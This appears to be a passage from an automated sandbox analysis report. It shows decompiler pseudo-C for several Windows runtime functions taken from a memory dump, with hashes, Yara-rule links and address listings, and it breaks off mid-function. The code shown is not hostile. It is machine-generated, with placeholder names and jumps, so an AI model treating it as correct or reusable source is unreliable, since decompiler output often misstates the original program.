                                                          • Opcode Fuzzy Hash: 91c21576733cbcc70da2ac2bf46e0b77435d233862e8aab77f51a5fb7c41f000
                                                          • Instruction Fuzzy Hash: 2781B375608B019FDB31CE98C880A6BBBE8EBA4254F18486FED559F350D331DD41CB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034CB8D0, Relevance: .2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 39%
                                                          			E034CB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3527b9c; // 0x0
				_t124 = L03454620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03479800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E034795B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E034795D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L034577F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03479910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E034795D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3527b9c; // 0x0
									_t92 = L03454620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03479910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0343A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E034CE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E034CE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E034795B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                          0x034cb8d9
                                                          0x034cb8e4
                                                          0x00000000
                                                          0x034cb8e6
                                                          0x034cb8f3
                                                          0x034cb8f5
                                                          0x034cb8f5
                                                          0x034cb8f8
                                                          0x034cb920
                                                          0x034cb924
                                                          0x034cb936
                                                          0x034cb939
                                                          0x034cb93d
                                                          0x034cb948
                                                          0x034cb9a0
                                                          0x034cb9a0
                                                          0x034cb9a4
                                                          0x034cb9bf
                                                          0x034cb9c4
                                                          0x034cb9c6
                                                          0x034cb9cd
                                                          0x034cb9d1
                                                          0x034cbad4
                                                          0x034cbad8
                                                          0x034cbada
                                                          0x034cbadc
                                                          0x034cbadc
                                                          0x034cbadf
                                                          0x034cbae0
                                                          0x034cbae2
                                                          0x034cbae4
                                                          0x034cbaec
                                                          0x034cbaee
                                                          0x034cbaf0
                                                          0x034cbaf0
                                                          0x034cbaec
                                                          0x034cbafb
                                                          0x034cbafc
                                                          0x034cbafe
                                                          0x034cbb01
                                                          0x034cbb01
                                                          0x00000000
                                                          0x034cbb06
                                                          0x034cb9d7
                                                          0x034cb9db
                                                          0x034cb9db
                                                          0x034cb9de
                                                          0x034cb9de
                                                          0x034cb9e4
                                                          0x034cb9e7
                                                          0x034cb9ea
                                                          0x034cb9ec
                                                          0x034cb9ef
                                                          0x034cb9f3
                                                          0x034cba1b
                                                          0x034cba1b
                                                          0x034cba23
                                                          0x034cba24
                                                          0x034cba27
                                                          0x034cba2a
                                                          0x034cba2b
                                                          0x034cba2e
                                                          0x034cba30
                                                          0x034cba37
                                                          0x034cba3f
                                                          0x034cba9c
                                                          0x034cbaa2
                                                          0x034cbb13
                                                          0x034cbb15
                                                          0x034cbaae
                                                          0x034cbaae
                                                          0x034cbab3
                                                          0x034cbab5
                                                          0x034cbaba
                                                          0x034cbac8
                                                          0x034cbac8
                                                          0x034cbaba
                                                          0x034cbacd
                                                          0x034cbacf
                                                          0x00000000
                                                          0x034cbacf
                                                          0x034cbb1a
                                                          0x00000000
                                                          0x034cbb1c
                                                          0x034cbaa7
                                                          0x034cbb11
                                                          0x00000000
                                                          0x034cbb11
                                                          0x034cbaa9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034cba41
                                                          0x034cba41
                                                          0x034cba41
                                                          0x034cba58
                                                          0x034cba5d
                                                          0x034cba62
                                                          0x00000000
                                                          0x00000000
                                                          0x034cba64
                                                          0x034cba67
                                                          0x034cba68
                                                          0x034cba69
                                                          0x034cba6c
                                                          0x034cba6f
                                                          0x034cba71
                                                          0x034cba78
                                                          0x034cba80
                                                          0x00000000
                                                          0x00000000
                                                          0x034cba90
                                                          0x034cba90
                                                          0x034cba97
                                                          0x00000000
                                                          0x034cba97
                                                          0x034cb9f5
                                                          0x034cb9f7
                                                          0x034cb9f7
                                                          0x034cb9fa
                                                          0x034cba03
                                                          0x034cba07
                                                          0x034cba0c
                                                          0x034cba10
                                                          0x034cba17
                                                          0x00000000
                                                          0x034cb9f7
                                                          0x034cb9a6
                                                          0x034cb9a8
                                                          0x034cb9af
                                                          0x034cb9b3
                                                          0x00000000
                                                          0x00000000
                                                          0x034cb9b9
                                                          0x00000000
                                                          0x034cb9b9
                                                          0x034cb94d
                                                          0x034cb98f
                                                          0x034cb995
                                                          0x034cb999
                                                          0x034cb960
                                                          0x034cb967
                                                          0x034cb968
                                                          0x034cb96a
                                                          0x00000000
                                                          0x034cb96a
                                                          0x034cb99b
                                                          0x034cb99e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034cb99e
                                                          0x034cb951
                                                          0x034cb954
                                                          0x034cb95a
                                                          0x034cb95e
                                                          0x034cb972
                                                          0x034cb979
                                                          0x034cb97d
                                                          0x034cb97f
                                                          0x034cb980
                                                          0x034cb982
                                                          0x034cb984
                                                          0x00000000
                                                          0x034cb984
                                                          0x00000000
                                                          0x034cb926
                                                          0x00000000
                                                          0x034cb926

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78126cc2b0d7184f36f5b3ab70a8a54c74fa09935b872f8a39c54ee8c6c896c3
                                                          • Instruction ID: ca0e89ab13ff6d7ff6a050543221cf7bad140ea435523dd8ecdfb0a9c93ede63
                                                          • Opcode Fuzzy Hash: 78126cc2b0d7184f36f5b3ab70a8a54c74fa09935b872f8a39c54ee8c6c896c3
                                                          • Instruction Fuzzy Hash: E971203A210B41EFD771CF25C842F56BBB9EB40720F18452EE6958F6A0EB71E941CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034352A5, Relevance: .2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E034352A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0344EEF0(0x35279a0);
					_t104 =  *0x3528210; // 0x2fd1ea0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E0344EB70(_t93, 0x35279a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E03479890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0344EEF0(0x35279a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0344EB70(0, 0x35279a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xfd1eb802
								_t13 = _t104 + 0xc; // 0x2fd1ead
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0346F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0344EEF0(0x35279a0);
									__eflags =  *0x3528210 - _t104; // 0x2fd1ea0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3528210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2002fd1e
											_t95 =  *((intOrPtr*)( *_t37));
											E034B4888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E0344EB70(_t95, 0x35279a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E034795D0();
											L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E034795D0();
											L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0344EB70(_t93, 0x35279a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E034795D0();
										L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E034795D0();
										L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2002fd1e
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xfd1eb802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0346F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                          0x034352a5
                                                          0x034352ad
                                                          0x034352b0
                                                          0x034352b3
                                                          0x034352b7
                                                          0x034352ba
                                                          0x034352bf
                                                          0x034352c4
                                                          0x034352cc
                                                          0x00000000
                                                          0x00000000
                                                          0x034352ce
                                                          0x034352d1
                                                          0x034352d9
                                                          0x034352dd
                                                          0x034352e7
                                                          0x034352f7
                                                          0x034352f9
                                                          0x034352fd
                                                          0x03490dcf
                                                          0x03490dd5
                                                          0x03490dd6
                                                          0x03490dd7
                                                          0x03490dd8
                                                          0x03490dd9
                                                          0x03490dde
                                                          0x03490ddf
                                                          0x03490de0
                                                          0x03490de1
                                                          0x03490de2
                                                          0x03490de2
                                                          0x03490de5
                                                          0x03490dea
                                                          0x03490dec
                                                          0x03490f60
                                                          0x03490f64
                                                          0x03490f70
                                                          0x03490f76
                                                          0x03490f79
                                                          0x03490f79
                                                          0x00000000
                                                          0x03490f64
                                                          0x03490df2
                                                          0x03490df7
                                                          0x03490e04
                                                          0x03490e04
                                                          0x03490e0d
                                                          0x03490e0d
                                                          0x03490e10
                                                          0x03490e1a
                                                          0x03490e1c
                                                          0x03490e4c
                                                          0x03490e52
                                                          0x03490e61
                                                          0x03490e67
                                                          0x03490e6b
                                                          0x03490e70
                                                          0x03490e76
                                                          0x03490ed7
                                                          0x03490edc
                                                          0x03490ee0
                                                          0x03490ee6
                                                          0x03490eea
                                                          0x03490eed
                                                          0x03490ef0
                                                          0x03490ef3
                                                          0x03490ef6
                                                          0x03490ef9
                                                          0x03490efb
                                                          0x03490efe
                                                          0x03490f01
                                                          0x03490f01
                                                          0x03490f0b
                                                          0x03490f12
                                                          0x03490f16
                                                          0x03490f18
                                                          0x03490f18
                                                          0x03490f1b
                                                          0x03490f2c
                                                          0x03490f31
                                                          0x03490f31
                                                          0x03490f35
                                                          0x03490f39
                                                          0x03490f3a
                                                          0x03490f3c
                                                          0x03490f3c
                                                          0x03490f3f
                                                          0x03490f50
                                                          0x03490f55
                                                          0x03490f55
                                                          0x03490f59
                                                          0x034352eb
                                                          0x034352f1
                                                          0x034352f1
                                                          0x03490e7d
                                                          0x03490e84
                                                          0x03490e88
                                                          0x03490e8a
                                                          0x03490e8a
                                                          0x03490e8d
                                                          0x03490e9e
                                                          0x03490ea3
                                                          0x03490ea3
                                                          0x03490ea7
                                                          0x03490eaf
                                                          0x03490eb3
                                                          0x03490eb9
                                                          0x03490eb9
                                                          0x03490ebc
                                                          0x03490ecd
                                                          0x03490ecd
                                                          0x00000000
                                                          0x03490eb3
                                                          0x03490e1e
                                                          0x03490e21
                                                          0x03490e25
                                                          0x03490e2b
                                                          0x03490e2f
                                                          0x03490e30
                                                          0x03490e3a
                                                          0x03490e3f
                                                          0x03490e41
                                                          0x00000000
                                                          0x00000000
                                                          0x03490e47
                                                          0x00000000
                                                          0x03490e47
                                                          0x03490df9
                                                          0x03490dfe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03490dfe
                                                          0x03435303
                                                          0x03435307
                                                          0x00000000
                                                          0x03435309
                                                          0x00000000
                                                          0x03435309
                                                          0x03435307
                                                          0x034352e9
                                                          0x034352e9
                                                          0x00000000
                                                          0x034352e9
                                                          0x0343530e
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 625865150ce7229c6f7505a1b493e7f652abdbb688e36de3652bbde3939c7009
                                                          • Instruction ID: 694296bb68097042269aaccccfb992425311e58d5bcfb9a7be3d45ee02388e8f
                                                          • Opcode Fuzzy Hash: 625865150ce7229c6f7505a1b493e7f652abdbb688e36de3652bbde3939c7009
                                                          • Instruction Fuzzy Hash: 3851BB35105741AFD720DF66C840B2BBBA8BF49710F18096FE4958F652E770E844CB9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03462AE4, Relevance: .2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E03462AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3528204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3528208; // 0x3528207
				_t8 = _t57 + 0x3528208; // 0x3528207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3528450; // 0x2fd3824
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x352821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3526d5c; // 0x7fcf0654
							_t72 =  *0x3526d5c; // 0x7fcf0654
							_t75 =  *0x3526d5c; // 0x7fcf0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3526d5c; // 0x7fcf0654
							_t84 =  *0x3526d5c; // 0x7fcf0654
							_t87 =  *0x3526d5c; // 0x7fcf0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0347F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                          0x03462ae4
                                                          0x03462aec
                                                          0x03462aef
                                                          0x03462af4
                                                          0x03462af7
                                                          0x03462afd
                                                          0x03462b92
                                                          0x03462b92
                                                          0x03462b97
                                                          0x03462b9c
                                                          0x03462b9c
                                                          0x03462b03
                                                          0x03462b06
                                                          0x03462b09
                                                          0x03462b09
                                                          0x03462b0f
                                                          0x03462b15
                                                          0x03462b15
                                                          0x03462b1b
                                                          0x03462b1e
                                                          0x03462b21
                                                          0x03462b26
                                                          0x03462b29
                                                          0x03462b81
                                                          0x03462b84
                                                          0x03462c0e
                                                          0x03462c15
                                                          0x03462c24
                                                          0x03462c24
                                                          0x03462b8a
                                                          0x03462b8a
                                                          0x03462b8a
                                                          0x03462b8a
                                                          0x03462b90
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03462b4a
                                                          0x03462b4a
                                                          0x03462b4d
                                                          0x03462b53
                                                          0x00000000
                                                          0x00000000
                                                          0x03462b55
                                                          0x03462b58
                                                          0x03462bb7
                                                          0x034a5d1b
                                                          0x034a5d37
                                                          0x034a5d47
                                                          0x034a5d53
                                                          0x03462bbd
                                                          0x03462bbd
                                                          0x03462bbd
                                                          0x03462bb7
                                                          0x03462b5d
                                                          0x03462c2f
                                                          0x034a5d5b
                                                          0x034a5d77
                                                          0x034a5d87
                                                          0x034a5d93
                                                          0x03462c35
                                                          0x03462c35
                                                          0x03462c35
                                                          0x03462c2f
                                                          0x03462b65
                                                          0x03462b9f
                                                          0x03462ba2
                                                          0x03462b67
                                                          0x03462b67
                                                          0x03462b69
                                                          0x03462b6b
                                                          0x03462b6e
                                                          0x03462bc9
                                                          0x03462bcc
                                                          0x03462bcf
                                                          0x03462bd4
                                                          0x03462bd6
                                                          0x03462bd6
                                                          0x03462bdb
                                                          0x03462c02
                                                          0x03462c05
                                                          0x03462c07
                                                          0x00000000
                                                          0x03462c07
                                                          0x03462be0
                                                          0x03462c00
                                                          0x03462c3f
                                                          0x03462c3f
                                                          0x00000000
                                                          0x03462c00
                                                          0x03462be5
                                                          0x03462be7
                                                          0x03462bec
                                                          0x03462bf4
                                                          0x03462bf6
                                                          0x00000000
                                                          0x03462bf6
                                                          0x03462b70
                                                          0x03462b76
                                                          0x03462b2b
                                                          0x03462b2b
                                                          0x03462b2d
                                                          0x03462b2f
                                                          0x03462b32
                                                          0x03462b35
                                                          0x03462b3a
                                                          0x00000000
                                                          0x03462b40
                                                          0x03462b43
                                                          0x03462b45
                                                          0x03462b47
                                                          0x03462b4a
                                                          0x03462b4d
                                                          0x03462b53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03462b53
                                                          0x03462b78
                                                          0x03462b78
                                                          0x03462b7b
                                                          0x03462b7e
                                                          0x00000000
                                                          0x03462b7e
                                                          0x03462b76
                                                          0x03462ba5
                                                          0x03462ba5
                                                          0x03462ba8
                                                          0x03462bad
                                                          0x00000000
                                                          0x00000000
                                                          0x03462baf
                                                          0x03462baf
                                                          0x03462bc2
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7de6a177a050f76b156b01efb376c6f499dc7adbec849adefebb342bf824166
                                                          • Instruction ID: 5aee2129fada43e482745018c3a440ba0d3dc6ae22597cb2a4d861919f9bc21a
                                                          • Opcode Fuzzy Hash: b7de6a177a050f76b156b01efb376c6f499dc7adbec849adefebb342bf824166
                                                          • Instruction Fuzzy Hash: 3851B076E00125DFCB14DF1CC4809BDB7B1FB99B00706895FE856AF324D670AA42CB9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0344EF40, Relevance: .1, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E0344EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03439080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
